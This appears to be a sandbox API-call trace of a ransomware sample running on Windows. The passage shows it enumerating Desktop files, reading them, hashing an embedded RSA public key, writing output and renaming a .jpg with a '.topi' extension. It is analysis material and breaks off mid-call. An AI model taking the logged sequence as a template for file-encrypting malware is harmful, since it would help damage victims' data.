RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9768 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9738 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9738 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9738 | out: hHeap=0x680000) returned 1 [0095.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9750 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9720 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9708 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f23d0 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.953] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x18d4f, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x18d4f, lpOverlapped=0x0) returned 1 [0095.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.954] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18d54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.954] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.954] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.954] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.954] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.954] CloseHandle (hObject=0x6a8) returned 1 [0095.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0095.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0095.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0095.962] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\uSviczcPXuVf6fam0Lcc.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\usviczcpxuvf6fam0lcc.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\uSviczcPXuVf6fam0Lcc.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\usviczcpxuvf6fam0lcc.jpg.topi")) returned 1 [0095.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.963] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.964] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581db1d0, ftCreationTime.dwHighDateTime=0x1d5bde1, ftLastAccessTime.dwLowDateTime=0x83fe7940, ftLastAccessTime.dwHighDateTime=0x1d5b9fb, ftLastWriteTime.dwLowDateTime=0x83fe7940, ftLastWriteTime.dwHighDateTime=0x1d5b9fb, nFileSizeHigh=0x0, nFileSizeLow=0x8b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XhST2VyAgleTA.png", cAlternateFileName="XHST2V~1.PNG")) returned 1 [0095.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0095.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0095.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0095.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\XhST2VyAgleTA.png") returned=".png" [0095.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\XhST2VyAgleTA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\xhst2vyagleta.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.965] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=35683) returned 1 [0095.965] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.967] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8b3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.968] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.968] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.968] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.968] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x8b63, lpOverlapped=0x0) returned 1 [0095.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.969] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.970] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.970] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.970] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.970] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.970] GetLastError () returned 0x0 [0095.970] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.970] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.970] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.970] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.970] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b60) returned 0x99f72d8 [0095.970] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f23d0 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9708 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2418 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9720 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9750 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9768 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.971] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9750 | out: hHeap=0x680000) returned 1 [0095.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0095.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9768 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9750 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9750 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.972] GetCurrentThreadId () returned 0x8c4 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f71e0 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.972] GetCurrentThreadId () returned 0x8c4 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9750 [0095.973] HeapFree (in: hHeap=0x680000, 